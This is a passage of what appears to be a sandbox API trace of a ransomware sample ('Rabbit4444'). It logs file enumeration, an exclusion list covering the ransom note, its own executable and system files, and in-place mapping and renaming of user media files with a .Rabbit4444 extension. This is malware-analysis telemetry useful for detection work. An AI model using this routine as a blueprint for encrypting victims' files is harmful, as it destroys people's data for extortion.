RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0050.452] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0050.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.453] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0050.453] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.453] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0050.453] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14176346893) returned 1 [0050.453] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0050.453] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0050.453] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.454] CloseHandle (hObject=0x298) returned 1 [0050.454] CloseHandle (hObject=0x278) returned 1 [0050.459] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\N8MfSDtCG2.avi.Rabbit4444") returned 57 [0050.459] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\N8MfSDtCG2.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\n8mfsdtcg2.avi"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\N8MfSDtCG2.avi.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\n8mfsdtcg2.avi.rabbit4444"), dwFlags=0x1) returned 1 [0050.460] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe24e94c0, ftCreationTime.dwHighDateTime=0x1d4ca42, ftLastAccessTime.dwLowDateTime=0xd178e460, ftLastAccessTime.dwHighDateTime=0x1d4c94e, ftLastWriteTime.dwLowDateTime=0xd178e460, ftLastWriteTime.dwHighDateTime=0x1d4c94e, nFileSizeHigh=0x0, nFileSizeLow=0xaf48, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nrGPsGERgaDJPgPU.m4a", cAlternateFileName="NRGPSG~1.M4A")) returned 1 [0050.460] lstrcmpiW (lpString1="nrGPsGERgaDJPgPU.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.460] lstrcmpiW (lpString1="nrGPsGERgaDJPgPU.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.460] lstrcmpiW (lpString1="nrGPsGERgaDJPgPU.m4a", lpString2="Rabbit4444.exe") returned -1 [0050.460] lstrcmpiW (lpString1="nrGPsGERgaDJPgPU.m4a", lpString2=".") returned 1 [0050.460] lstrcmpiW (lpString1="nrGPsGERgaDJPgPU.m4a", lpString2="..") returned 1 [0050.460] lstrcmpiW (lpString1="nrGPsGERgaDJPgPU.m4a", lpString2="windows") returned -1 [0050.460] lstrcmpiW (lpString1="nrGPsGERgaDJPgPU.m4a", lpString2="bootmgr") returned 1 [0050.460] lstrcmpiW (lpString1="nrGPsGERgaDJPgPU.m4a", lpString2="pagefile.sys") returned -1 [0050.460] lstrcmpiW (lpString1="nrGPsGERgaDJPgPU.m4a", lpString2="boot") returned 1 [0050.460] lstrcmpiW (lpString1="nrGPsGERgaDJPgPU.m4a", lpString2="ids.txt") returned 1 [0050.460] lstrcmpiW (lpString1="nrGPsGERgaDJPgPU.m4a", lpString2="NTUSER.DAT") returned -1 [0050.460] lstrcpyW (in: lpString1=0x130eb78, lpString2="nrGPsGERgaDJPgPU.m4a" | out: lpString1="nrGPsGERgaDJPgPU.m4a") returned="nrGPsGERgaDJPgPU.m4a" [0050.460] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\nrGPsGERgaDJPgPU.m4a", dwFileAttributes=0x0) returned 1 [0050.460] lstrlenW (lpString="nrGPsGERgaDJPgPU.m4a") returned 20 [0050.460] lstrlenW (lpString="Rabbit4444") returned 10 [0050.460] lstrcmpiW (lpString1="DJPgPU.m4a", lpString2="Rabbit4444") returned -1 [0050.460] lstrlenW (lpString=".dll") returned 4 [0050.460] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0050.460] lstrlenW (lpString=".lnk") returned 4 [0050.460] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0050.460] lstrlenW (lpString=".ini") returned 4 [0050.460] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0050.460] lstrlenW (lpString=".sys") returned 4 [0050.460] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0050.460] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\nrGPsGERgaDJPgPU.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nrgpsgergadjpgpu.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.461] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.461] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14177140822) returned 1 [0050.461] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=44872) returned 1 [0050.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0050.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0050.461] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb250, lpName=0x0) returned 0x298 [0050.461] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb250) returned 0x70000 [0050.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0050.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0050.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0050.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0050.463] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14177374941) returned 1 [0050.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0050.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0050.463] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.464] CloseHandle (hObject=0x298) returned 1 [0050.464] CloseHandle (hObject=0x278) returned 1 [0050.464] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\nrGPsGERgaDJPgPU.m4a.Rabbit4444") returned 63 [0050.464] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\nrGPsGERgaDJPgPU.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nrgpsgergadjpgpu.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\nrGPsGERgaDJPgPU.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nrgpsgergadjpgpu.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0050.465] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x943679d0, ftCreationTime.dwHighDateTime=0x1d4d1de, ftLastAccessTime.dwLowDateTime=0x8b0e4130, ftLastAccessTime.dwHighDateTime=0x1d4cb26, ftLastWriteTime.dwLowDateTime=0x8b0e4130, ftLastWriteTime.dwHighDateTime=0x1d4cb26, nFileSizeHigh=0x0, nFileSizeLow=0x4bcd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PeXqoZ-.png", cAlternateFileName="")) returned 1 [0050.465] lstrcmpiW (lpString1="PeXqoZ-.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.465] lstrcmpiW (lpString1="PeXqoZ-.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.465] lstrcmpiW (lpString1="PeXqoZ-.png", lpString2="Rabbit4444.exe") returned -1 [0050.465] lstrcmpiW (lpString1="PeXqoZ-.png", lpString2=".") returned 1 [0050.465] lstrcmpiW (lpString1="PeXqoZ-.png", lpString2="..") returned 1 [0050.465] lstrcmpiW (lpString1="PeXqoZ-.png", lpString2="windows") returned -1 [0050.465] lstrcmpiW (lpString1="PeXqoZ-.png", lpString2="bootmgr") returned 1 [0050.465] lstrcmpiW (lpString1="PeXqoZ-.png", lpString2="pagefile.sys") returned 1 [0050.465] lstrcmpiW (lpString1="PeXqoZ-.png", lpString2="boot") returned 1 [0050.465] lstrcmpiW (lpString1="PeXqoZ-.png", lpString2="ids.txt") returned 1 [0050.465] lstrcmpiW (lpString1="PeXqoZ-.png", lpString2="NTUSER.DAT") returned 1 [0050.465] lstrcpyW (in: lpString1=0x130eb78, lpString2="PeXqoZ-.png" | out: lpString1="PeXqoZ-.png") returned="PeXqoZ-.png" [0050.465] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\PeXqoZ-.png", dwFileAttributes=0x0) returned 1 [0050.465] lstrlenW (lpString="PeXqoZ-.png") returned 11 [0050.465] lstrlenW (lpString="Rabbit4444") returned 10 [0050.465] lstrcmpiW (lpString1="eXqoZ-.png", lpString2="Rabbit4444") returned -1 [0050.465] lstrlenW (lpString=".dll") returned 4 [0050.465] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0050.466] lstrlenW (lpString=".lnk") returned 4 [0050.466] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0050.466] lstrlenW (lpString=".ini") returned 4 [0050.466] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0050.466] lstrlenW (lpString=".sys") returned 4 [0050.466] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0050.466] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\PeXqoZ-.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pexqoz-.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.466] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.466] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14177771836) returned 1 [0050.467] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=19405) returned 1 [0050.467] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0050.467] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0050.467] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4ed0, lpName=0x0) returned 0x298 [0050.467] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4ed0) returned 0x70000 [0050.468] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.468] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0050.468] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.468] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0050.468] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.468] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0050.468] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.468] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0050.468] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14177923612) returned 1 [0050.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0050.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0050.469] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.469] CloseHandle (hObject=0x298) returned 1 [0050.469] CloseHandle (hObject=0x278) returned 1 [0050.469] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\PeXqoZ-.png.Rabbit4444") returned 54 [0050.469] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\PeXqoZ-.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pexqoz-.png"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\PeXqoZ-.png.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pexqoz-.png.rabbit4444"), dwFlags=0x1) returned 1 [0050.470] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb51f2e40, ftCreationTime.dwHighDateTime=0x1d4ce1d, ftLastAccessTime.dwLowDateTime=0xc79461b0, ftLastAccessTime.dwHighDateTime=0x1d4cb8b, ftLastWriteTime.dwLowDateTime=0xc79461b0, ftLastWriteTime.dwHighDateTime=0x1d4cb8b, nFileSizeHigh=0x0, nFileSizeLow=0x1399f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pQptGfPg-Sv0bZ6J39X.mkv", cAlternateFileName="PQPTGF~1.MKV")) returned 1 [0050.470] lstrcmpiW (lpString1="pQptGfPg-Sv0bZ6J39X.mkv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.470] lstrcmpiW (lpString1="pQptGfPg-Sv0bZ6J39X.mkv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.470] lstrcmpiW (lpString1="pQptGfPg-Sv0bZ6J39X.mkv", lpString2="Rabbit4444.exe") returned -1 [0050.470] lstrcmpiW (lpString1="pQptGfPg-Sv0bZ6J39X.mkv", lpString2=".") returned 1 [0050.470] lstrcmpiW (lpString1="pQptGfPg-Sv0bZ6J39X.mkv", lpString2="..") returned 1 [0050.470] lstrcmpiW (lpString1="pQptGfPg-Sv0bZ6J39X.mkv", lpString2="windows") returned -1 [0050.470] lstrcmpiW (lpString1="pQptGfPg-Sv0bZ6J39X.mkv", lpString2="bootmgr") returned 1 [0050.470] lstrcmpiW (lpString1="pQptGfPg-Sv0bZ6J39X.mkv", lpString2="pagefile.sys") returned 1 [0050.470] lstrcmpiW (lpString1="pQptGfPg-Sv0bZ6J39X.mkv", lpString2="boot") returned 1 [0050.470] lstrcmpiW (lpString1="pQptGfPg-Sv0bZ6J39X.mkv", lpString2="ids.txt") returned 1 [0050.470] lstrcmpiW (lpString1="pQptGfPg-Sv0bZ6J39X.mkv", lpString2="NTUSER.DAT") returned 1 [0050.470] lstrcpyW (in: lpString1=0x130eb78, lpString2="pQptGfPg-Sv0bZ6J39X.mkv" | out: lpString1="pQptGfPg-Sv0bZ6J39X.mkv") returned="pQptGfPg-Sv0bZ6J39X.mkv" [0050.470] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\pQptGfPg-Sv0bZ6J39X.mkv", dwFileAttributes=0x0) returned 1 [0050.470] lstrlenW (lpString="pQptGfPg-Sv0bZ6J39X.mkv") returned 23 [0050.471] lstrlenW (lpString="Rabbit4444") returned 10 [0050.471] lstrcmpiW (lpString1="Z6J39X.mkv", lpString2="Rabbit4444") returned 1 [0050.471] lstrlenW (lpString=".dll") returned 4 [0050.471] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0050.471] lstrlenW (lpString=".lnk") returned 4 [0050.471] lstrcmpiW (lpString1=".mkv", lpString2=".lnk") returned 1 [0050.471] lstrlenW (lpString=".ini") returned 4 [0050.471] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0050.471] lstrlenW (lpString=".sys") returned 4 [0050.471] lstrcmpiW (lpString1=".mkv", lpString2=".sys") returned -1 [0050.471] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\pQptGfPg-Sv0bZ6J39X.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pqptgfpg-sv0bz6j39x.mkv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.471] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.471] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14178169083) returned 1 [0050.471] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=80287) returned 1 [0050.471] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0050.471] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101958 [0050.471] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13ca0, lpName=0x0) returned 0x298 [0050.471] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13ca0) returned 0x70000 [0050.473] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.473] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0050.473] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.473] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0050.473] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.473] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0050.473] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.474] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0050.474] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14178430598) returned 1 [0050.474] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0050.474] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101958 | out: hHeap=0xe0000) returned 1 [0050.474] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.474] CloseHandle (hObject=0x298) returned 1 [0050.474] CloseHandle (hObject=0x278) returned 1 [0050.475] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\pQptGfPg-Sv0bZ6J39X.mkv.Rabbit4444") returned 66 [0050.475] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\pQptGfPg-Sv0bZ6J39X.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pqptgfpg-sv0bz6j39x.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\pQptGfPg-Sv0bZ6J39X.mkv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pqptgfpg-sv0bz6j39x.mkv.rabbit4444"), dwFlags=0x1) returned 1 [0050.476] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4db3da0, ftCreationTime.dwHighDateTime=0x1d4ced7, ftLastAccessTime.dwLowDateTime=0xa74a9cb0, ftLastAccessTime.dwHighDateTime=0x1d4d10a, ftLastWriteTime.dwLowDateTime=0xa74a9cb0, ftLastWriteTime.dwHighDateTime=0x1d4d10a, nFileSizeHigh=0x0, nFileSizeLow=0xf613, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r6veU.mp4", cAlternateFileName="")) returned 1 [0050.476] lstrcmpiW (lpString1="r6veU.mp4", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.476] lstrcmpiW (lpString1="r6veU.mp4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.476] lstrcmpiW (lpString1="r6veU.mp4", lpString2="Rabbit4444.exe") returned -1 [0050.476] lstrcmpiW (lpString1="r6veU.mp4", lpString2=".") returned 1 [0050.476] lstrcmpiW (lpString1="r6veU.mp4", lpString2="..") returned 1 [0050.476] lstrcmpiW (lpString1="r6veU.mp4", lpString2="windows") returned -1 [0050.476] lstrcmpiW (lpString1="r6veU.mp4", lpString2="bootmgr") returned 1 [0050.476] lstrcmpiW (lpString1="r6veU.mp4", lpString2="pagefile.sys") returned 1 [0050.476] lstrcmpiW (lpString1="r6veU.mp4", lpString2="boot") returned 1 [0050.476] lstrcmpiW (lpString1="r6veU.mp4", lpString2="ids.txt") returned 1 [0050.476] lstrcmpiW (lpString1="r6veU.mp4", lpString2="NTUSER.DAT") returned 1 [0050.476] lstrcpyW (in: lpString1=0x130eb78, lpString2="r6veU.mp4" | out: lpString1="r6veU.mp4") returned="r6veU.mp4" [0050.476] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\r6veU.mp4", dwFileAttributes=0x0) returned 1 [0050.476] lstrlenW (lpString="r6veU.mp4") returned 9 [0050.476] lstrlenW (lpString="Rabbit4444") returned 10 [0050.476] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0050.476] lstrlenW (lpString=".dll") returned 4 [0050.476] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0050.476] lstrlenW (lpString=".lnk") returned 4 [0050.476] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0050.476] lstrlenW (lpString=".ini") returned 4 [0050.476] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0050.476] lstrlenW (lpString=".sys") returned 4 [0050.476] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0050.476] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\r6veU.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\r6veu.mp4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.477] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.477] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14178736603) returned 1 [0050.477] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=62995) returned 1 [0050.477] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0050.477] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0050.477] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf920, lpName=0x0) returned 0x298 [0050.477] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf920) returned 0x70000 [0050.478] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.478] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0050.478] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.478] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0050.479] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.479] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0050.479] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.479] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0050.479] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14178963347) returned 1 [0050.479] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0050.479] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0050.479] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.480] CloseHandle (hObject=0x298) returned 1 [0050.480] CloseHandle (hObject=0x278) returned 1 [0050.480] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\r6veU.mp4.Rabbit4444") returned 52 [0050.480] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\r6veU.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\r6veu.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\r6veU.mp4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\r6veu.mp4.rabbit4444"), dwFlags=0x1) returned 1 [0050.481] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a9984f0, ftCreationTime.dwHighDateTime=0x1d4d2d7, ftLastAccessTime.dwLowDateTime=0xd008470, ftLastAccessTime.dwHighDateTime=0x1d4c963, ftLastWriteTime.dwLowDateTime=0xd008470, ftLastWriteTime.dwHighDateTime=0x1d4c963, nFileSizeHigh=0x0, nFileSizeLow=0x1465e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="shbgybF2YTr 4USG.m4a", cAlternateFileName="SHBGYB~1.M4A")) returned 1 [0050.481] lstrcmpiW (lpString1="shbgybF2YTr 4USG.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.481] lstrcmpiW (lpString1="shbgybF2YTr 4USG.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.481] lstrcmpiW (lpString1="shbgybF2YTr 4USG.m4a", lpString2="Rabbit4444.exe") returned 1 [0050.481] lstrcmpiW (lpString1="shbgybF2YTr 4USG.m4a", lpString2=".") returned 1 [0050.481] lstrcmpiW (lpString1="shbgybF2YTr 4USG.m4a", lpString2="..") returned 1 [0050.481] lstrcmpiW (lpString1="shbgybF2YTr 4USG.m4a", lpString2="windows") returned -1 [0050.481] lstrcmpiW (lpString1="shbgybF2YTr 